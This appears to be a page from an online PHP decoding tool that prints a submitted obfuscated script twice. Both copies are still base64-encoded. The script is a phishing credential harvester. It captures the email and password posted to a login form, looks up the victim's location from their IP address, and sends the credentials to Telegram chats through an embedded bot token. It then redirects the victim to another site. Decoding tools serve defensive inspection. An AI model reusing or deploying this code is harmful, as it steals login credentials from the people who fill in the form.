Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),1);ini_set(base64_decode('ZGlzcGxheV9z..
Decoded Output download
<?php ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),1);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),1);error_reporting(E_ALL);define(base64_decode('VE9LRU4='),base64_decode('NzAyMTM4MTQ1NzpBQUVuMzRoUlpWdDVrUkpRVkRkUm9WZ2VIRDZ3Tmp5b2FzVQ=='));$a3=[649165596,663226720];function w0(){if(!empty($_SERVER[base64_decode('SFRUUF9DTElFTlRfSVA=')]))$o4=$_SERVER[base64_decode('SFRUUF9DTElFTlRfSVA=')];elseif(!empty($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')]))$o4=$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')];else $o4=$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];return $o4;}if(isset($_POST[base64_decode('ZW1haWw=')])&&isset($_POST[base64_decode('cGFzc3dvcmQ=')])){$k5=$_POST[base64_decode('ZW1haWw=')];$p6=$_POST[base64_decode('cGFzc3dvcmQ=')];$o7=str_replace(base64_decode('Lg=='),base64_decode('Xw=='),$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]);$o4=w0();$q8=file_get_contents(base64_decode('YXNzZXRzL2pzb24vY291bnRyaWVzLmpzb24='));$l9=json_decode($q8,true);$ya=@unserialize(file_get_contents(base64_decode('aHR0cDovL2lwLWFwaS5jb20vcGhwLw==').$o4));$ib=base64_decode('8J+PtA==').base64_decode('Og==').base64_decode('VW5rbm93bg==');if($ya&&$ya[base64_decode('c3RhdHVz')]==base64_decode('c3VjY2Vzcw==')){$ib=$l9[$ya[base64_decode('Y291bnRyeUNvZGU=')]][base64_decode('ZW1vamk=')].base64_decode('Og==').$ya[base64_decode('Y2l0eQ==')];}$bc=urlencode(g1($k5,$p6,base64_decode('Q09ETQ=='),$o7,$ib));foreach($a3 as&$wd){if(strpos($k5,base64_decode('dGVzdEB0ZXN0'))!==false&&$wd==$a3[1])continue;n2($bc,$wd);}}function g1($k5,$p6,$me,$o7,$ib){return" : <pre>$k5</pre><pre>$p6</pre> $me $o7 $ib";}function n2($bc,$rf){$n10=base64_decode('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA==').TOKEN.base64_decode('Lw==');$p11=$n10.base64_decode('c2VuZE1lc3NhZ2U/dGV4dD0=').$bc.base64_decode('JmNoYXRfaWQ9').$rf.base64_decode('JnBhcnNlX21vZGU9aHRtbA==');$w12=curl_init();curl_setopt($w12,CURLOPT_URL,$p11);curl_setopt($w12,CURLOPT_FAILONERROR,true);curl_setopt($w12,CURLOPT_FOLLOWLOCATION,true);curl_setopt($w12,CURLOPT_RETURNTRANSFER,true);curl_exec($w12);curl_close($w12);}header(base64_decode('TG9jYXRpb246IGh0dHBzOi8vYWN0aXZpc2lvbmNwcGx1cy5jb20vcmVxdWVzdC5odG1s'));exit();?>
Did this file decode correctly?
Original Code
<?php ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),1);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),1);error_reporting(E_ALL);define(base64_decode('VE9LRU4='),base64_decode('NzAyMTM4MTQ1NzpBQUVuMzRoUlpWdDVrUkpRVkRkUm9WZ2VIRDZ3Tmp5b2FzVQ=='));$a3=[649165596,663226720];function w0(){if(!empty($_SERVER[base64_decode('SFRUUF9DTElFTlRfSVA=')]))$o4=$_SERVER[base64_decode('SFRUUF9DTElFTlRfSVA=')];elseif(!empty($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')]))$o4=$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')];else $o4=$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];return $o4;}if(isset($_POST[base64_decode('ZW1haWw=')])&&isset($_POST[base64_decode('cGFzc3dvcmQ=')])){$k5=$_POST[base64_decode('ZW1haWw=')];$p6=$_POST[base64_decode('cGFzc3dvcmQ=')];$o7=str_replace(base64_decode('Lg=='),base64_decode('Xw=='),$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]);$o4=w0();$q8=file_get_contents(base64_decode('YXNzZXRzL2pzb24vY291bnRyaWVzLmpzb24='));$l9=json_decode($q8,true);$ya=@unserialize(file_get_contents(base64_decode('aHR0cDovL2lwLWFwaS5jb20vcGhwLw==').$o4));$ib=base64_decode('8J+PtA==').base64_decode('Og==').base64_decode('VW5rbm93bg==');if($ya&&$ya[base64_decode('c3RhdHVz')]==base64_decode('c3VjY2Vzcw==')){$ib=$l9[$ya[base64_decode('Y291bnRyeUNvZGU=')]][base64_decode('ZW1vamk=')].base64_decode('Og==').$ya[base64_decode('Y2l0eQ==')];}$bc=urlencode(g1($k5,$p6,base64_decode('Q09ETQ=='),$o7,$ib));foreach($a3 as&$wd){if(strpos($k5,base64_decode('dGVzdEB0ZXN0'))!==false&&$wd==$a3[1])continue;n2($bc,$wd);}}function g1($k5,$p6,$me,$o7,$ib){return" : <pre>$k5</pre><pre>$p6</pre> $me $o7 $ib";}function n2($bc,$rf){$n10=base64_decode('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA==').TOKEN.base64_decode('Lw==');$p11=$n10.base64_decode('c2VuZE1lc3NhZ2U/dGV4dD0=').$bc.base64_decode('JmNoYXRfaWQ9').$rf.base64_decode('JnBhcnNlX21vZGU9aHRtbA==');$w12=curl_init();curl_setopt($w12,CURLOPT_URL,$p11);curl_setopt($w12,CURLOPT_FAILONERROR,true);curl_setopt($w12,CURLOPT_FOLLOWLOCATION,true);curl_setopt($w12,CURLOPT_RETURNTRANSFER,true);curl_exec($w12);curl_close($w12);}header(base64_decode('TG9jYXRpb246IGh0dHBzOi8vYWN0aXZpc2lvbmNwcGx1cy5jb20vcmVxdWVzdC5odG1s'));exit();?>
Function Calls
None |
Stats
MD5 | f850017fc16da1e0d434c65dcbccb631 |
Eval Count | 0 |
Decode Time | 43 ms |